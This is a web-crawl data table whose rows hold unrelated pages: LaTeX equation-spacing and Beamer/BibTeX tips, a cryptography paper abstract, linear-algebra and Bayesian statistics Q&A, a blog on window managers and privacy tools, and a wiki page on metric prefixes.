Columns: url (string, 14–2.42k chars) · text (string, 100–1.02M chars) · date (string, 19 chars) · metadata (string, 1.06k–1.1k chars)
https://tex.stackexchange.com/questions/446246/what-is-the-best-way-to-space-an-equation
# What is the best way to space an equation? Recently I have chosen to change the typical way of writing in math mode to one in which there is extra space before certain operators or symbols (think of arrows, =, :, etc.). Consider this MWE: \documentclass{article} \usepackage[spanish]{babel} \selectlanguage{spanish} \usepackage[utf8]{inputenc} \usepackage[T1]{fontenc} \usepackage{amsmath} \begin{document} Normal writing: $x+2=0\Rightarrow x=-2.$ Own writing: $\begin{matrix}x+2 & = & 0 && \Rightarrow && x & = & -2.\end{matrix}$ \end{document} Another example: $\begin{matrix} \begin{cases}y\quad=&xk_1,\; k_1\in\mathbb Z\\z\quad=&xk_2,\; k_2\in\mathbb Z\end{cases} &\Rightarrow& y+z&=&xk_1+xk_2 &\Rightarrow& y+z=x\underbrace{(k_1+k_2)}_{k_3\in\mathbb Z}&\Rightarrow& y+z=xk_3 &\Rightarrow& x\mid y+z. \end{matrix}$ Note that it produces an extra-alignment-tab error, but the point is that I don't want to set the spacing manually, so as not to make that mistake again. I use the matrix environment because: • it's easy to program; • automatic centering when the \\ command is used; • it requires a single package to work. Anyway, for certain types of equations, keeping them centered becomes a bit visually annoying. In addition, I use a personalized spacing for each environment (not one general number): Example 1: $\begin{matrix}x+2+1+52&=&2\\y&=&2\\z&=&1\end{matrix}$ Example 2 (same as Example 1 but with vertical space): $\def\arraystretch{1.5}\begin{matrix}x+2+1+52&=&2\\y&=&2\\z&=&1\end{matrix}$ Example 3 (with more vertical space): $\def\arraystretch{3.0}\begin{matrix}\displaystyle\int_2^2{x\;\text dx}&=&2+\dfrac x2\\\displaystyle\int_2^2{x\;\text dx}&=&2+\dfrac x2\end{matrix}$ Note that I manually typed a convenient \arraystretch to match the other spacing as closely as possible. I do this for every equation in the document... Also, inside a matrix environment there could be further substructures, such as cases, array, etc. I would like to know if there is any environment that does this work, or how it could be automated as well as possible so that the horizontal and vertical spacing stays consistent (maybe using a personalized command, maybe a package, etc.). Any kind of contribution is appreciated. Thanks! • Sorry, but if you want to change "normal writing" of math into "something unreadable", I don't feel like spending my own time helping you to do that! – alephzero Aug 16 '18 at 7:43 • Thank you for answering! I don't know if it is a "something unreadable" change. Think about five or six lines of integrals; they are very tight! – manooooh Aug 16 '18 at 7:45 • Honestly I agree the result is very unreadable. However, consider that all the spacing LaTeX inserts is based on some configurable lengths, so instead of ad-hoc hacking with matrices, you could look into how relations and operators are spaced (\mathrel, \mathbin etc.) and the corresponding vertical lengths – Bordaigorl Aug 16 '18 at 8:57 • The tabstackengine package allows things to be set with a uniform vertical gap (see "short stacks" in stackengine package documentation), and with math tabbing with customized horizontal spacing. What it won't allow is the numbering of individual equations. See mirrors.ibiblio.org/CTAN/macros/latex/contrib/stackengine/…, ctan.mirrors.hoobly.com/macros/latex/contrib/tabstackengine/…. – Steven B. Segletes Aug 16 '18 at 9:50 The tabstackengine package allows things to be set with a uniform vertical gap (see "short stacks" in the stackengine package documentation), along with math tabbing with customized horizontal spacing.
What it won't allow is the numbering of individual equations. I created \CtabbedShortstack to mean a centered \tabbedShortstack, since the package's \Centerstack, \Vectorstack and \Matrixstack macros employ "long stacks", which have a constant baselineskip rather than a constant gap. In the MWE below, there is a 12pt gap between equations, and an extra 7pt of horizontal gap added to the horizontal spacing around tabs. Because the OP's example seemed to show it, I retained centered alignment of columns, rather than something akin to align (which in this case would be rcl alignment). \documentclass{article} \usepackage{tabstackengine} \TABstackMath \TABstackMathstyle{\displaystyle} \setstackgap{S}{12pt} \setstacktabbedgap{7pt} \TABbinary \newcommand\CtabbedShortstack[2][c]{% \setbox0=\hbox{\tabbedShortstack[#1]{#2}}% \vcenter{\box0}% } \begin{document} \noindent Example 2: $\tabbedShortstack{ x + 2 + 1 + 52 &=& 2\\ y &=& 2\\ z &=& 1 }$ Example 3: $\tabbedShortstack{ \int_2^2 x \,dx &=& 2 + \frac{x}{2}\\ \int_2^2 x \,dx &=& 2 + \frac{x}{2} }$ First in stack numbered $$\tabbedShortunderstack{ x + 2 + 1 + 52 &=& 2\\ \int_2^2 x \,dx &=& 2 + \frac{x}{2} }$$ Last in stack numbered $$\tabbedShortstack{ \int_2^2 x \,dx &=& 2 + \frac{x}{2}\\ x + 2 + 1 + 52 &=& 2 }$$ Middle of stack numbered $$\CtabbedShortstack{ \int_2^2 x \,dx &=& 2 + \frac{x}{2}\\ \int_2^2 x \,dx &=& 2 + \frac{x}{2} }$$ \end{document}
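For comparison, here is a minimal sketch (my own addition, not part of the answer above) of the stock-amsmath route the comments hint at: an aligned block with an enlarged \jot gives a uniform vertical gap without hand-tuned \arraystretch values.

```latex
\documentclass{article}
\usepackage{amsmath}
\begin{document}
% \jot is the extra space amsmath inserts between rows of align/aligned;
% setting it once plays the role of the per-equation \arraystretch tuning.
\setlength{\jot}{12pt}
\[
\begin{aligned}
x + 2 + 1 + 52 &= 2\\
y              &= 2\\
z              &= 1
\end{aligned}
\]
\end{document}
```

Unlike the matrix approach, aligned uses rl alignment around the relation, so no extra alignment tabs are needed.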
2019-08-24 10:03:36
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 3, "x-ck12": 0, "texerror": 0, "math_score": 0.8761827945709229, "perplexity": 2495.3132369492896}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027320156.86/warc/CC-MAIN-20190824084149-20190824110149-00397.warc.gz"}
https://eprint.iacr.org/2021/1273
### OpenSquare: Decentralized Repeated Modular Squaring Service Sri AravindaKrishnan Thyagarajan, Tiantian Gong, Adithya Bhat, Aniket Kate, and Dominique Schröder ##### Abstract Repeated modular squaring is a versatile computational operation that has led to practical constructions of timed-cryptographic primitives like time-lock puzzles (TLP) and verifiable delay functions (VDF), which have a fast-growing list of applications. While there is huge interest in timed-cryptographic primitives in the blockchain area, we find two real-world concerns that need immediate attention for their large-scale practical adoption: firstly, the requirement to constantly perform computations seems unrealistic for most users; secondly, choosing the parameter for the bound $T$ seems complicated due to the lack of heuristics and experience. We present Opensquare, a decentralized repeated modular squaring service, that overcomes the above concerns. Opensquare lets clients outsource their repeated modular squaring computation via smart contracts to any computationally powerful servers that offer computational services for rewards in an unlinkable manner. Opensquare naturally gives us publicly computable heuristics about a pre-specified number ($T$) and the corresponding reward amounts of repeated squarings necessary for a time period. Moreover, Opensquare rewards multiple servers for a single request in a Sybil-resistant manner to incentivise maximum server participation, and is therefore resistant to censorship and single points of failure. We give a game-theoretic analysis to support the mechanism design of Opensquare, which: (1) incentivises servers to stay available with their services, (2) minimizes the cost of outsourcing for the client, and (3) ensures the client receives the valid computational result with high probability. To demonstrate practicality, we also implement Opensquare's smart contract in Solidity and report the gas costs for all of its functions. Our results show that the on-chain computational costs for both the clients and the servers are quite low, and therefore feasible for practical deployments and usage. Note: Published at ACM CCS 2021. Category: Cryptographic protocols. Publication info: Preprint. MINOR revision. Keywords: Time-Lock Puzzles, Repeated Modular Squaring, Smart Contracts. Contact author(s): t srikrishnan @ gmail com. History: 2022-03-16: revised. Short URL: https://ia.cr/2021/1273. License: CC BY. BibTeX: @misc{cryptoeprint:2021/1273, author = {Sri AravindaKrishnan Thyagarajan and Tiantian Gong and Adithya Bhat and Aniket Kate and Dominique Schröder}, title = {OpenSquare: Decentralized Repeated Modular Squaring Service}, howpublished = {Cryptology ePrint Archive, Paper 2021/1273}, year = {2021}, note = {\url{https://eprint.iacr.org/2021/1273}}, url = {https://eprint.iacr.org/2021/1273} } Note: In order to protect the privacy of readers, eprint.iacr.org does not use cookies or embedded third party content.
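For concreteness, the operation being outsourced is $T$ sequential modular squarings, i.e. computing $x^{2^T} \bmod N$. A minimal sketch (illustrative only, not the paper's protocol):

```python
def repeated_squaring(x: int, T: int, N: int) -> int:
    """Compute x^(2^T) mod N by T sequential squarings.

    Timed primitives (TLPs, RSA-based VDFs) rely on the assumption that,
    without the factorization of N, no known method beats performing the
    T squarings one after another.
    """
    y = x % N
    for _ in range(T):
        y = pow(y, 2, N)  # one squaring step; inherently sequential
    return y

# A client would publish (x, T, N) plus a reward; servers compute and
# return repeated_squaring(x, T, N).
print(repeated_squaring(5, 10, 2**61 - 1))
```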
2023-01-30 07:24:34
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2227097600698471, "perplexity": 8849.059410217027}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499804.60/warc/CC-MAIN-20230130070411-20230130100411-00243.warc.gz"}
http://mathhelpforum.com/advanced-algebra/112250-linear-transformation.html
1. ## Linear Transformation If $T:\mathbb{R}^2\to\mathbb{R}^3$ is a linear transformation such that $T\left(\begin{bmatrix}1\\2\end{bmatrix}\right)=\begin{bmatrix}11\\14\\6\end{bmatrix}$ and $T\left(\begin{bmatrix}4\\-1\end{bmatrix}\right)=\begin{bmatrix}17\\2\\6\end{bmatrix}$, what is the standard matrix of T? Any help is appreciated 2. I don't know what a standard matrix is, but I am going to assume it means the matrix of T with respect to the standard basis. Now what you need to find is what T does to the standard basis: $T\left(\begin{bmatrix}1\\2\end{bmatrix}\right)=T\left(\begin{bmatrix}1\\0\end{bmatrix}+2\cdot\begin{bmatrix}0\\1\end{bmatrix}\right)=T\left(\begin{bmatrix}1\\0\end{bmatrix}\right)+2T\left(\begin{bmatrix}0\\1\end{bmatrix}\right)=\begin{bmatrix}11\\14\\6\end{bmatrix}$ And: $T\left(\begin{bmatrix}4\\-1\end{bmatrix}\right)=T\left(4\cdot\begin{bmatrix}1\\0\end{bmatrix}-1\cdot\begin{bmatrix}0\\1\end{bmatrix}\right)=4T\left(\begin{bmatrix}1\\0\end{bmatrix}\right)-1T\left(\begin{bmatrix}0\\1\end{bmatrix}\right)=\begin{bmatrix}17\\2\\6\end{bmatrix}$ Multiplying the lower formula by 2 and adding it to the upper one gives: $9T\left(\begin{bmatrix}1\\0\end{bmatrix}\right)+0=\begin{bmatrix}11\\14\\6\end{bmatrix}+2\cdot\begin{bmatrix}17\\2\\6\end{bmatrix}$ So that $T\left(\begin{bmatrix}1\\0\end{bmatrix}\right)=\frac{1}{9}\cdot\begin{bmatrix}45\\18\\18\end{bmatrix}$ Now find $T\left(\begin{bmatrix}0\\1\end{bmatrix}\right)$ And the standard matrix would then be: $\begin{bmatrix}T\left(\begin{bmatrix}1\\0\end{bmatrix}\right) & T\left(\begin{bmatrix}0\\1\end{bmatrix}\right)\end{bmatrix}$ 3. As above, I repeat the equations. $T(\vec{x})=A\vec{x},\quad A=[T(\vec{e}_1)\ \ T(\vec{e}_2)]$ $T(\vec{e}_1)=\frac{1}{9}\cdot\begin{bmatrix}45\\18\\18\end{bmatrix}=\begin{bmatrix}5\\2\\2\end{bmatrix}\ ,\ T(\vec{e}_2)=\begin{bmatrix}3\\6\\2\end{bmatrix}\ ,\ A=\begin{bmatrix}5&3\\2&6\\2&2\end{bmatrix}$
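A quick numerical check of the final matrix (a sketch using NumPy; the input/output vectors are the ones given in the question):

```python
import numpy as np

# Standard matrix found above: columns are T(e1) and T(e2).
A = np.array([[5, 3],
              [2, 6],
              [2, 2]])

# It should reproduce the two given values of T.
print(A @ np.array([1, 2]))    # expected [11 14  6]
print(A @ np.array([4, -1]))   # expected [17  2  6]
```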
2017-08-23 02:43:00
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 8, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.771426796913147, "perplexity": 503.83296377184377}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886117519.82/warc/CC-MAIN-20170823020201-20170823040201-00045.warc.gz"}
http://www.rlazo.org/page/2/
# StumpWM: my new Window Manager I used Awesome as my window manager for over two years and I really liked it. It was my first "tiling" WM (although it's described as a tiling WM, it's more of a floating-tiling mix; see its features and non-features). Besides that, it was really configurable, and I mean it. Your configuration file (.config/rc.lua) may seem like half of the implementation of the WM, because it is there that you define which layouts are supported, how many tags to use, how to name them, the default keybindings, the mouse actions, etc. (here is mine). Probably, as with many WMs, Awesome is too spartan for Gnome/KDE users. But again, it is for people who like minimalism. If you want to give it a try, do it, and do it for a week at least. It's nice. If it is soooo good, why did I change it? Well, I had some stability issues with it for a while (which ended up being problems with Xorg, so it's not their fault). Also, there are two features I don't like. First, while bringing lots of flexibility, the config file is usually "cluttered" with code you don't want to see. As I said, it seems like half of the WM is written in the config file, so you have tons of code defining the default WM behaviour and, after a while, you stop feeling like you are configuring the WM and start feeling that you are patching it. Every new release was an exercise in retrofitting your changes onto the new default config file, otherwise you might lose some of the new features brought by the update. Awful. Second, Lua. The config file and other parts of the WM are written in Lua, which is not part of my personal preferences. I may be biased by my lack of knowledge about programming in Lua, or maybe not; even Julien Danjou, the original author of Awesome, has ranted about it. So, one day I decided to try other tiling WMs. I installed StumpWM, i3, ratpoison, and xmonad. I never got past the first one. StumpWM is not the most stable WM out there, nor the most lightweight (it requires a CL interpreter), and it has neither a large nor extremely active community (its latest stable release is from March 2010, but the repository is active so you get your code from there). Now, to the good stuff. StumpWM is tiling, but has some support for floating "groups" (desktops). AFAIK, it doesn't have the advanced automatic tiling layouts of Awesome, so its window placement capabilities are more closely related to GNU Screen or Emacs frames, but given that I usually have a single app in full-screen mode it doesn't matter. What really makes StumpWM shine is that it's written in Common Lisp. It's at least as configurable as Awesome while keeping your configuration file clean. Being Common Lisp, you can write a new function and it will override the previous one (not as powerful as advice in Emacs, but close enough). If you don't know Lisp, learning it is very easy. Once you get past the feeling of "why are there so many parentheses?" and get used to the prefix (+ 3 2) syntax, you will see it's pure genius. If you want to give it a try, the best way to do it is following the ArchLinux wiki. Also, take a look at the awesome StumpWM experience video. # Problems with x11-terms/rxvt-unicode I had some graphical problems with urxvt: it didn't show some lines, and I needed to switch between workspaces (so the window was refreshed) to see the content. After a long search I found a YouTube video which shows (almost) exactly my problem, and a solution: I just needed to recompile it with +truetype as a USE flag. Hope this is useful to somebody else.
# (sort of) Bye, Bye, Dropbox I use Dropbox, and I (kind of still) think it is a great service, but then I found out that they do server-side encryption, so they have access to all the data. Last Sunday they had a tiny security problem which made all accounts accessible using any password. I have to admit that I do store some important information there, but I did my homework and encrypted it using PGP before uploading. Still, I'm taking the next step: I've switched to SpiderOak as my main remote storage/sync service, given that they do client-side encryption, so my data is safe(r). My Dropbox account is going to store only things which I have absolutely no problem sharing. # Beamer handouts with notes This week, while working on a presentation I had to give, I wanted to create a nice handout with extra lines on one side to write some notes. I've seen people doing this all the time with other presentation software, so I supposed that it was possible with beamer. If you read the Beamer user guide (PDF), it mentions modifying the heading to include the handout option, and adding an additional command to specify the number of pages per page: \documentclass[handout]{beamer} % Other packages... \pgfpagesuselayout{2 on 1}[a4paper,border shrink=5mm] This produced a PDF with two slides per page (or more depending on what you want), but no notes space anywhere. Some further googling turned up a TeX StackExchange entry with the solution, which pointed to this blog post by Guido Diepen. What you need to do is download this package, add it to your document preamble, and then modify the \pgfpagesuselayout command (to include "with notes") like this: % add this package to your directory (not in CTAN!) \usepackage{handoutWithNotes} \pgfpagesuselayout{2 on 1 with notes}[a4paper,border shrink=5mm] Check out the original blog post by Guido to see examples and more options. Enjoy! P.d. I forgot to add "with notes" the first time, and I didn't realize that right away. So be aware in case you are as sloppy as I am. # Beamer + Bibtex I was trying to get Beamer + BibTeX working just like I did with a regular article, just including a frame with the references. So this was my first attempt: \begin{frame} \begin{small} \phantomsection \bibliographystyle{plain} \bibliography{bibliography} \end{small} \end{frame} \end{document} I didn't like the size of the entries, and the fact that they only spanned a single frame, so only a few entries were visible. Some Googling and I came up with an improved solution: \begin{frame}[shrink=5,allowframebreaks] \begin{small} \phantomsection \bibliographystyle{plain} \bibliography{bibliography} \end{small} \end{frame} \end{document} Then I realized that the citations weren't included in the bibliography! Sure, the entries were there but, which one was the "13"? BibTeX showed some nice, and pretty useless, icons instead of the citations. Further Googling unveiled an answer (there may be others), using natbib + BibTeX (here is a quick reference to natbib): % before \begin{document} \usepackage[square]{natbib} \newcommand{\newblock}{} Enjoy. I know being tracked by Google/Microsoft/Facebook wherever you go on the net is not something you really want, so I've made a couple of changes lately to mitigate that. I decided to get rid of my Facebook account, and it wasn't easy. They have a creepy amount of data about you, and all those Facebook-enabled sites give information to Facebook. That, and the fact that it is a big time sucker, moved me to delete my account. If you want to know how to do it, read here.
My blog used to have Google Analytics, but now I've found a compelling, open-source alternative: Piwik. It has a very nice interface, and there is a WordPress plugin to easily integrate it. So, if you are visiting this blog, you are no longer tracked by Google Analytics. Now that I'm talking about privacy, I just want to add that I do use Google's search engine, Buzz, Gmail, Reader and Picasa. Google search results are the best, so I don't think I will be switching to something else anytime soon; I'm alternating Buzz and Twitter as my "social" networks, and I don't like the alternatives to Picasa or Reader, so I'm sticking with them. And yes, I trust Google more than I trust Facebook. Edit: As pointed out by Seth in a comment, you don't need to set your username or password if you are going to use OAuth and the master password, as I'm doing. My configuration snippet now reflects that. I started to get interested in Twitter a few weeks ago, after some time having my account abandoned. I'm using Twittering mode, which is pretty nice: it has support for OAuth (twitter.el doesn't have that, so don't bother trying to use it), supports multiple URL shorteners (I use bit.ly), easy navigation, tons of functionality (check the EmacsWiki for a comprehensive list). Get it from github: git clone git://github.com/hayamiz/twittering-mode.git Today I found this blog post, which explains how to avoid the OAuth request every time you start your Emacs: (setq twittering-use-master-password t) Of course, EmacsWiki also explains that, but it is buried inside a comment, so I didn't read it… This is my configuration: (require 'twittering-mode) (setq twittering-timer-interval 36000 ; I don't want auto-refresh twittering-bitly-api-key "XXX") ; find it on bit.ly settings # Nice Python Gems EDIT (9/18/2011): There is another way of having a default value in python dictionaries, and it's using the defaultdict class in the collections module (python 2.5). Here are the docs. I was checking my old bookmarks and I stumbled upon these two blog posts: Gems of Python by Eric Florenzano and Python gems of my own by Eric Holscher. Did you know about setdefault for dicts? I've found myself more than once using a dict as a multimap and I always felt that there must be a better way of doing it than this: dct = {} items = ['anne', 'david', 'kevin', 'eric', 'anthony', 'andrew'] for name in items: if name[0] not in dct: dct[name[0]] = [] dct[name[0]].append(name) And I was right; from Eric Florenzano's post: dct = {} items = ['anne', 'david', 'kevin', 'eric', 'anthony', 'andrew'] for name in items: dct.setdefault(name[0], []).append(name) I knew it… # Things I keep forgetting: Gnus reply key bindings ### Summary mode: While reading a mail, you could reply to it using the following commands: key command
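Returning to the Python gems above: the collections.defaultdict alternative mentioned in the EDIT looks like this (a minimal sketch):

```python
from collections import defaultdict

# Same multimap pattern as in the setdefault example: missing keys are
# created with list() automatically on first access.
dct = defaultdict(list)
items = ['anne', 'david', 'kevin', 'eric', 'anthony', 'andrew']
for name in items:
    dct[name[0]].append(name)

print(dict(dct))  # {'a': ['anne', 'anthony', 'andrew'], 'd': ['david'], ...}
```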
2014-04-18 03:00:54
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.39083290100097656, "perplexity": 2121.369114882977}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-15/segments/1397609532480.36/warc/CC-MAIN-20140416005212-00184-ip-10-147-4-33.ec2.internal.warc.gz"}
https://artofproblemsolving.com/wiki/index.php/SI
# Système international (Redirected from SI) The système international of units (French for "international system"), more commonly known as the metric system, is a system of standardized measurements or units that are based on the number ten. ## Origin The metric system was first suggested at the prestigious French school École Polytechnique, supported by the well-known mathematician and physicist Joseph Louis Lagrange. They derived the metric unit of length, the meter, from what they considered to be $\frac{1}{10^6}$th of the distance from a certain point in Europe to the North Pole. It is now known that it is actually approximately $\frac{1.16}{10^6}$th of that distance. ## Prefixes The majority of the units of the metric system can be increased or decreased by factors of ten using the following system: • Yocto - $10^{-24}$ • Zepto - $10^{-21}$ • Atto - $10^{-18}$ • Femto - $10^{-15}$ • Pico - $10^{-12}$ • Nano - $10^{-9}$ • Micro - $10^{-6}$ • Milli - $10^{-3}$ • Centi - $10^{-2}$ • Deci - $10^{-1}$ • No prefix - $10^{0}$, or just $1$. • Deka (or Deca) - $10^{1}$ • Hecto - $10^{2}$ • Kilo - $10^3$ • Mega - $10^6$ • Giga - $10^9$ • Tera - $10^{12}$ • Peta - $10^{15}$ • Exa - $10^{18}$ • Zetta - $10^{21}$ • Yotta - $10^{24}$ ## Types of Measure The following measures are part of the metric system: ## See Also
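Since the prefixes are just powers of ten, rescaling between them is a single multiplication. An illustrative sketch (names and exponents taken from the table above, a subset for brevity):

```python
# Exponents from the prefix table above.
PREFIX = {'nano': -9, 'micro': -6, 'milli': -3, 'centi': -2, 'deci': -1,
          '': 0, 'deka': 1, 'hecto': 2, 'kilo': 3, 'mega': 6, 'giga': 9}

def convert(value, from_prefix, to_prefix):
    """Rescale a quantity between two metric prefixes of the same unit."""
    return value * 10 ** (PREFIX[from_prefix] - PREFIX[to_prefix])

print(convert(2.5, 'kilo', ''))        # 2.5 km  -> 2500.0 m
print(convert(300, 'milli', 'centi'))  # 300 mm  -> 30.0 cm
```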
2021-06-18 12:20:39
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 24, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8692077994346619, "perplexity": 6318.841550545272}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623487636559.57/warc/CC-MAIN-20210618104405-20210618134405-00019.warc.gz"}
http://math.stackexchange.com/questions/239171/questions-on-bayesian-analysis-of-an-opinion-poll-an-example-in-a-book
# Questions on Bayesian analysis of an opinion poll (an example in a book) I'm sorry in advance for rather long questions. This is an example in "Bayesian Logical Data Analysis for the Physical Sciences" by P. C. Gregory, and I have some questions about it. In a poll of 800 decided voters, 440 voters supported the political party A. Let's denote the poll result as $D$. The quantity of interest is the probability that party A will achieve a majority of at least 51% in the upcoming election, assuming the poll will be representative of the population at the time of the election. The book regards the problem as a model selection problem. $M_1$ : The party A will achieve a majority, with a parameter $H$ that has a uniform prior in the range $0.51 \le H \le 1$. $M_2$ : The party A will not achieve a majority, with a parameter $H$ that has a uniform prior in the range $0 \le H < 0.51$. If we have no prior reason to prefer $M_1$ over $M_2$, we can write the odds ratio \begin{aligned} O_{12}&=p(M_1|D,I)/p(M_2|D,I)\\ &=p(D|M_1,I)/p(D|M_2,I)\\ &=\frac{\int_{0.51}^1 p(H|M_1,I)p(D|H,M_1,I) dH }{\int_{0}^{0.51} p(H|M_2,I)p(D|H,M_2,I) dH}\\ &=\frac{\int_{0.51}^1 (1/0.49)p(D|H,M_1,I) dH }{\int_{0}^{0.51} (1/0.51)p(D|H,M_2,I) dH}\\ &=87.68 \end{aligned} Here are my questions. The book doesn't give explicit expressions for $p(D|H,M_1,I)$ and $p(D|H,M_2,I)$. If I use the binomial distribution $$p(D|H,M_1,I)=p(D|H,M_2,I)=\frac{800! H^{440}(1-H)^{800-440}}{440!(800-440)!}$$ I get $87.03$ as a result. It is not the same as the value $87.68$ in the book. What probability distribution should I use for the likelihoods? I have another question. Why do I have to introduce the models $M_1$ and $M_2$? Is $$O_{12}=\frac{\int_{0.51}^1 p(H|D,I) dH}{\int_{0}^{0.51} p(H|D,I) dH}$$ not an appropriate approach for the problem? It does not have the factor $(1/0.49)/(1/0.51)$ introduced with the models $M_1$ and $M_2$. - $87.03$ looks reasonable to me as the ratio of the integrals. The reason for the models and the $p(H|M,I)$ terms is to avoid rewarding uncertain hypotheses for their uncertainty. You may disagree, arguing that uncertain hypotheses are more likely to be true. For example, if one hypothesis was that $H=0.55$ exactly and the other was $0 \le H \lt 0.1$, then your final suggestion would always give $O_{12}=0$ no matter what data was supplied, since the numerator would always be an integration over a zero-length interval, while the denominator would always be positive.
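The odds ratio is easy to check numerically: with a binomial likelihood the binomial coefficient cancels in the ratio, and the two integrals reduce to regularized incomplete beta functions. A sketch (the printed value should land near the $87.03$ computed above):

```python
from scipy.special import betainc

# Integrals of H^440 (1-H)^360 over [0.51, 1] and [0, 0.51].
# betainc(a, b, x) is the regularized incomplete beta function, i.e. the
# Beta(441, 361) CDF at x, so the common factor B(441, 361) * C(800, 440)
# cancels when we take the ratio.
F = betainc(441, 361, 0.51)          # likelihood mass below H = 0.51
O12 = ((1 - F) / 0.49) / (F / 0.51)  # priors 1/0.49 and 1/0.51
print(O12)                           # ~87, matching the question's value
```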
2016-07-29 00:33:31
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8559667468070984, "perplexity": 225.06379723394065}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-30/segments/1469257829320.91/warc/CC-MAIN-20160723071029-00022-ip-10-185-27-174.ec2.internal.warc.gz"}
https://dipy.org/documentation/1.5.0/examples_built/affine_registration_3d/
